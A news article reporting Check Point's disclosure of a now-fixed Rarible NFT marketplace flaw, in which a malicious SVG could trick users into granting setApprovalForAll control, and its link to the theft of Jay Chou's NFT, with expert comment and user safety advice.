Skip links

Star loses $500,000 NFT after crooks exploit Rarible market

Miscreants exploited a now-fixed design flaw in the Rarible NFT marketplace to steal a non-fungible token from Taiwanese singer and actor Jay Chou and sell it for about $500,000.

That’s according to folks at Check Point, who on Thursday said the vulnerability could have been abused by crooks to gain full control of victims’ marketplace accounts and the funds in them. Earlier this month, Chou said his NFT was stolen in what looked like a phishing attack.

When researchers Roman Zaikin, Dikla Barda and Oded Vanunu investigated the security shortcoming they found that fraudsters could lure users to click on a link to malicious NFT, enabling them to take control of their marks’ Rarible accounts using a standard called EIP-721.

This standard is normally used to track and transfer NFTs, and includes a function called setApprovalForAll. That function authorizes who can control a user’s tokens and was created primarily to enable third parties like Rarible and OpenSea to control tokens on behalf of the users, according to Check Point.

“This function is very dangerous by design because this may allow anyone to control your NFTs if you get tricked into signing it,” the researcher trio said. “It’s not always clear to users exactly what permissions they are giving by signing a transaction. Most of the time, the victim assumes these are regular transactions when in fact, they were giving control over their own NFTs.”

Attackers tend to use these types of transactions in phishing attacks, but they become more dangerous when an NFT marketplace is involved. The threat hunters noted that Raribl lets anyone create and sell art, which can be anything that ends with a PNG, GIF, SVG, MP4, WEBM and MP3 file extension and a maximum size of 100MB.

So they created an SVG file with a simple payload. Anyone clicking on the art and opening it in another tab or by pressing on the IPFS link, a JavaScript payload would execute.

It’s an easy lure because what’s “so great about [a] wallet transaction is it doesn’t have to run under the same domain, so we don’t need any private information such as cookies or sessions,” they wrote. “All the victim needs is a wallet and the attacker will use the JSON-RPC to abuse it.”

The Check Point payload checked the NFTs the victim had, using the Ethereum API tokennfttx and the researchers looked at all the NFTs, sending the setApprovalForAll transaction to the user’s wallet. By clicking on the “confirm” button, the user gives the attacker full access to all the NFTs under the contract sent by the attacker.

The attacker can then transfer all of the NFTs under the contract to their own account by using the transferFrom function on the contract because the victim has unwittingly allowed it.

Check Point alerted Rarible to the vulnerability and worked with the marketplace to create a fix. A spokesperson for Rarible was not available for immediate comment.

Easy pickings in nascient market

The flaw put a focus on how vulnerable the relatively nascent NFT and cryptocurrency sectors are to bad actors seeking a quick payday and the need for security measures to harden, according to the Check Point team.

“Blockchain innovation is fast underway and NFTs are here to stay,” they wrote. “Given the sheer pace of innovation, there is an inherent challenge in securely integrating software applications and crypto markets. Threat actors know they have an open window right now to take advantage of, with consumer adoption spiking, while security measures in this space still need to catch up.”

They said cybersecurity professionals need to develop new ways to better secure blockchain technologies to secure people’s cryptocurrency assets.

The threat it out there. In February, 17 users of the OpenSea NFT marketplace were scammed out of $1.7 million in a phishing attack that allowed hackers to steal hundreds of NFTs. Another 15 users interacted with the attackers but didn’t lose tokens.

Nick Donarski, founder and CTO of blockchain company ORE System, wrote in a column last month about the security issues surrounding NFTs.

“Each NFT comes integrated with a unique signature to verify its authenticity and uniqueness, as well as its chain of ownership, meaning that these assets (much like the cryptocurrencies they are bought with) are noninterchangeable,” Donarski wrote. “However, no technology is inherently secure or infallible. Because NFTs are still a relatively new innovation, there are a number of risks associated with their creation, use, and trade.”

The sheer demand for NFTs also makes them an attractive target. According to Check Point, Rarible has more than 2.1 million users and saw more than $273 million worth of NFTs traded in 2021. The marketplace also supports three blockchains with more than 400,000 NFTs minted. NFT creators also can earn up to 50 percent in royalties when someone resells their NFT on the secondary market.

The popularity of NFTs and cryptocurrency is being driven by non-technical people, “so even if the underlying technology is reasonably secure, threat actors can still fall back to phishing or social engineering to exploit their victims,” Mike Parkin, senior technical engineer at Vulcan Cyber, told The Register.

Karl Steinkamp, director at cybersecurity advisory Coalfire, told The Register that companies in the digital assets space need to find a balance between fast innovation and security. Ethereum-based blockchains and technologies, like NFTs, tend to move swiftly and “often break stuff along the way,” he said.

“On the other hand, we have bitcoin, that while it does innovate, it does so glacially and intentionally very slow,” Steinkamp said. “Due to its upgrade processes, bitcoin is far more stable and resistant to attacks than other crypto assets.”

Users need to be careful when receiving requests to sign any link within Rarible or other marketplaces, according to Check Point. Before approving any request, they need to understand what is be requested and whether the request seems suspicious.

If there are doubts, the user should reject the request. They can link to a token approval checker site to review and revoke token approvals. ®